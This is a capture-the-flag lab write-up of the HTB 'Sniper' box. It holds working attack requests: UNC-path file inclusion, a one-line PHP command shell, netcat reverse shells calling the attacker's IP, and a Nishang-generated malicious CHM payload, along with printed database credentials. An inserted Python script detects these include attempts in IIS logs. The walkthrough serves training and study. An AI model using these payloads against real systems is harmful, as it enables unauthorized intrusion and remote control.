Sniper is another box I got access to through an unintended method. The PHP application wasn't supposed to be exploitable through Remote File Inclusion, but because it runs on Windows, we can use a UNC path to include a file from an SMB share. Once I had a shell, I pivoted using plink and logged in as user Chris with WinRM. The box author was nice enough to leave hints as to what kind of malicious payload was expected, and I used Nishang to generate a CHM payload and get Administrator access.
Summary
- Exploit an RFI in the language parameter to include a PHP file through SMB and gain RCE
- Retrieve the MySQL credentials from the database
- Upgrade the shell to a meterpreter shell and port forward WinRM
- Login as user Chris with the forwarded WinRM socket
- Identify through hints that the admin is waiting for a .chm file
- Craft a malicious .chm file and get a reverse shell as Administrator
Portscan
root@kali:~/htb/sniper# nmap -sC -sV -T4 -p- 10.10.10.151
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 09:01 EDT
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.049s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m13s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-06T20:04:16
|_  start_date: N/A
SMB
There is no access to SMB shares, either with an invalid user or with a null session:
root@kali:~/htb/sniper# smbmap -u invalid -H 10.10.10.151
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[!] Authentication error on 10.10.10.151
root@kali:~/htb/sniper# smbmap -u '' -H 10.10.10.151
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.151
Web
The website is pretty generic and most of the links don't work.

At the bottom of the main page there is a link to the User Portal.

The user portal has a login page and there is a link at the bottom to register a new user.

The registration page looks like this.

After creating myself an account, I log in and see that it's still under construction.

Next, I scanned the site with rustbuster and found a blog link I didn't see earlier.

The blog is pretty generic but there is an interesting link to change the language of the page.

As shown in the page source, the language link references a PHP file by name, which makes it a likely target for an LFI or RFI.

Gaining RCE through RFI in the language parameter
To test for local file inclusion I'll try including a Windows file I know exists on the target machine. Luckily for me, the lang parameter takes the full filename including the extension, so I can potentially include any file, not just files with a .php extension. I am able to get the content of win.ini with the following:
GET /blog/?lang=/windows/win.ini

Next I tried to include a remote file over HTTP with GET /blog/?lang=http://10.10.14.11/test.php, but I didn't get a callback, so I assume remote file includes are disabled or there is some filtering done on the parameter.
Even though remote file includes are disabled, using a UNC path works, since PHP treats it as a local filesystem path rather than a URL. I'm able to get a callback through SMB on port 445 with GET /blog/?lang=//10.10.14.11/test/test.php

I can't get impacket-smbserver working right with this box, so instead I'll use the standard Samba server in Linux and create an open share: net usershare add test /root/htb/sniper/share '' 'Everyone:F' guest_ok=y
Before trying to get RCE, I'll create an info.php file that calls phpinfo() so I can check for any disabled functions:
<?php
phpinfo();
?>
After calling phpinfo() with GET /blog/?lang=//10.10.14.11/test/info.php I see that it's running Windows build 17763 and that no functions are disabled.


Next I'll create another PHP file to execute commands passed in the cmd parameter:
<?php
system($_GET["cmd"]);
?>
And with the following request I can execute commands: GET /blog/?lang=//10.10.14.11/test/nc.php&cmd=whoami

To get a shell I'll upload netcat to the server with GET /blog/?lang=//10.10.14.11/test/nc.php&cmd=copy+\\10.10.14.11\test\nc.exe+c:\programdata\nc.exe

Then I execute netcat to get a shell with GET /blog/?lang=//10.10.14.11/test/nc.php&cmd=c:\programdata\nc.exe+-e+cmd.exe+10.10.14.11+80
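To show the defender's side of the requests above, here is an added example (not from the writeup) that scans constructed IIS W3C log lines for lang values that are absolute paths, remote URLs or UNC paths, and notes when a cmd parameter rides along. The allowlisted lang shape (a bare name.php) and the log field order are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C log lines (not taken from the box). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
SAMPLE_LOG = """\
2019-10-06 13:02:11 10.10.10.151 GET /blog/ lang=blog-en.php 80 10.10.14.11 200
2019-10-06 13:02:20 10.10.10.151 GET /blog/ lang=/windows/win.ini 80 10.10.14.11 200
2019-10-06 13:02:31 10.10.10.151 GET /blog/ lang=http://10.10.14.11/test.php 80 10.10.14.11 200
2019-10-06 13:02:45 10.10.10.151 GET /blog/ lang=//10.10.14.11/test/test.php 80 10.10.14.11 200
2019-10-06 13:03:02 10.10.10.151 GET /blog/ lang=//10.10.14.11/test/nc.php&cmd=whoami 80 10.10.14.11 200
"""

# Assumed shape of a legitimate value: a bare file name such as blog-en.php
ALLOWED_LANG = re.compile(r"^[A-Za-z0-9_-]+\.php$")

def classify_lang(value):
    """Classify one lang value the way a WAF rule or SIEM query would."""
    v = unquote(value)
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return "remote-url"   # refused by PHP when allow_url_include is off, still worth an alert
    if v.startswith(("//", "\\\\")):
        return "unc-path"     # PHP on Windows opens this as a local path, so it bypasses that setting
    if v.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", v) or ".." in v:
        return "local-path"   # absolute path or traversal: classic LFI probe (win.ini etc.)
    if ALLOWED_LANG.match(v):
        return "ok"
    return "unexpected"

def scan_iis_log(text):
    """Return (client, stem, lang, verdict, has_cmd) for every suspicious lang value."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 9:
            continue
        stem, query, client = fields[4], fields[5], fields[7]
        params = parse_qs(query, keep_blank_values=True)
        for lang in params.get("lang", []):
            verdict = classify_lang(lang)
            if verdict != "ok":
                # a cmd parameter next to the include is the RCE stage, not just a probe
                findings.append((client, stem, lang, verdict, "cmd" in params))
    return findings
```

The same classifier doubles as the server-side validation the blog should have applied: anything other than "ok" is rejected before it ever reaches include().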

Enumeration of the machine
The first thing I check is the C:\inetpub\wwwroot\user\db.php file used by the login portal so I can see which credentials are used to connect to the database:
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>
Then I check out which local users are present on the box:
C:\>net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Chris                    DefaultAccount
Guest                    WDAGUtilityAccount
The next logical step is to get access to user Chris, so I look at the account details:
...
Local Group Memberships      *Remote Management Users
Global Group memberships     *None
...
Chris is part of the Remote Management Users group and WinRM is listening on port 5985 but firewalled off from the outside.
C:\>netstat -an
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:33060          0.0.0.0:0              LISTENING
[...]
Shell as user Chris with WinRM
To connect to WinRM I'll upload plink.exe and create a reverse tunnel for port 5985.

After pivoting, I am able to log in as user Chris.

I find that WinRM is a tad slow, so I'll spawn another netcat as user Chris to continue my enumeration.
More enumeration
The c:\docs directory was inaccessible to the previous user, but I can see the files now as user Chris.
C:\docs>dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640
 Directory of C:\docs
10/01/2019  01:04 PM    <DIR>          .
10/01/2019  01:04 PM    <DIR>          ..
04/11/2019  09:31 AM               285 note.txt
04/11/2019  09:17 AM           552,607 php for dummies-trial.pdf
               2 File(s)        552,892 bytes
               2 Dir(s)  17,885,601,792 bytes free
The .pdf doesn't have anything interesting, but note.txt contains a hint:
type note.txt
Hi Chris,
	Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
Ok, so the CEO (probably the administrator) is expecting some documentation files to be dropped in this folder. There's probably a scripted bot running that opens files in this folder. I don't know what kind of payload he's expecting, so I'll keep on looking around the box.
The C:\Users\Chris\Downloads directory contains a CHM file.
C:\Users\Chris\Downloads>dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640
 Directory of C:\Users\Chris\Downloads
04/11/2019  08:36 AM    <DIR>          .
04/11/2019  08:36 AM    <DIR>          ..
04/11/2019  08:36 AM            10,462 instructions.chm
               1 File(s)         10,462 bytes
               2 Dir(s)  17,885,601,792 bytes free
As per Wikipedia:
Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
So now things are starting to click:
- The admin/CEO is expecting documentation
- The instructions.chm file is a compiled HTML file used for documentation
I remembered reading about malicious CHM files some time ago so I make sure to open the file in an isolated Windows VM:

I did some research and found the Nishang Out-CHM tool that can generate a malicious payload. I should be able to get RCE as the administrator with this malicious file.
Generating a malicious CHM file for privilege escalation
After installing the HTML Help Workshop on my Windows machine, I generated a malicious CHM file that uses netcat to spawn a reverse shell:
PS > Out-CHM -Payload "C:\programdata\nc.exe -e cmd.exe 10.10.14.11 3333" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
I uploaded it to the server:
*Evil-WinRM* PS C:\docs> copy \\10.10.14.11\test\doc.chm .
And boom, got a shell as administrator:
